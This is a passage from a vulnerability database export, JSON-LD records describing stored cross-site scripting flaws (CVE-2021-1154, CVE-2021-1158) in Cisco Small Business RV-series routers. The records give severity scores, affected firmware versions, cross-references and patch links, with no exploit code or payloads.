            "db": "VULHUB",
            "id": "VHN-374212"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1158",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002662",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41156",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.0141",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1022",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-374212",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41156"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374212"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002662"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1022"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1158"
          }
        ]
      },
      "id": "VAR-202101-0800",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41156"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374212"
          }
        ],
        "trust": 1.3006743266666665
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41156"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:34:59.826000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-stored-xss-LPTQ3EQC",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-stored-xss-LPTQ3EQC"
          },
          {
            "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W cross-site scripting vulnerability (CNVD-2021-41156)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/272236"
          },
          {
            "title": "Multiple Cisco Fixes for product cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139428"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41156"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002662"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1022"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.1
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-374212"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002662"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1158"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-stored-xss-lptq3eqc"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1158"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.0141/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41156"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374212"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002662"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1022"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1158"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41156"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374212"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002662"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1022"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1158"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41156"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374212"
          },
          {
            "date": "2021-09-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002662"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1022"
          },
          {
            "date": "2021-01-13T22:15:15.803000",
            "db": "NVD",
            "id": "CVE-2021-1158"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41156"
          },
          {
            "date": "2021-01-15T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374212"
          },
          {
            "date": "2021-09-29T04:41:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002662"
          },
          {
            "date": "2021-01-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1022"
          },
          {
            "date": "2024-11-21T05:43:42.997000",
            "db": "NVD",
            "id": "CVE-2021-1158"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1022"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Cross-site scripting vulnerabilities in routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002662"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1022"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202101-0796

    Vulnerability from variot - Updated: 2024-11-23 21:34

    Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0796",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "application extension platform",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "cisco rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "application extension platform",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41160"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002667"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1154"
          }
        ]
      },
      "cve": "CVE-2021-1154",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CVE-2021-1154",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CNVD-2021-41160",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "VHN-374208",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 1.7,
                "id": "CVE-2021-1154",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "HIGH",
                "scope": "CHANGED",
                "trust": 2.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.8,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2021-1154",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "High",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1154",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1154",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1154",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-41160",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202101-1054",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-374208",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41160"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374208"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002667"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1054"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1154"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1154"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1154"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002667"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41160"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374208"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1154",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002667",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41160",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.0141",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1054",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-374208",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41160"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374208"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002667"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1054"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1154"
          }
        ]
      },
      "id": "VAR-202101-0796",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41160"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374208"
          }
        ],
        "trust": 1.3006743266666665
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41160"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:34:59.797000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-stored-xss-LPTQ3EQC",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-stored-xss-LPTQ3EQC"
          },
          {
            "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W cross-site scripting vulnerability (CNVD-2021-41160)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/272216"
          },
          {
            "title": "Multiple  Cisco Fixes for product cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139156"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41160"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002667"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1054"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.1
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-374208"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002667"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1154"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-stored-xss-lptq3eqc"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1154"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.0141/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41160"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374208"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002667"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1054"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1154"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41160"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374208"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002667"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1054"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1154"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41160"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374208"
          },
          {
            "date": "2021-09-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002667"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1054"
          },
          {
            "date": "2021-01-13T22:15:15.473000",
            "db": "NVD",
            "id": "CVE-2021-1154"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41160"
          },
          {
            "date": "2021-01-15T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374208"
          },
          {
            "date": "2021-09-29T05:33:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002667"
          },
          {
            "date": "2021-01-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1054"
          },
          {
            "date": "2024-11-21T05:43:42.453000",
            "db": "NVD",
            "id": "CVE-2021-1154"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1054"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Cross-site scripting vulnerabilities in routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002667"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1054"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202101-0799

    Vulnerability from variot - Updated: 2024-11-23 21:34

    Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
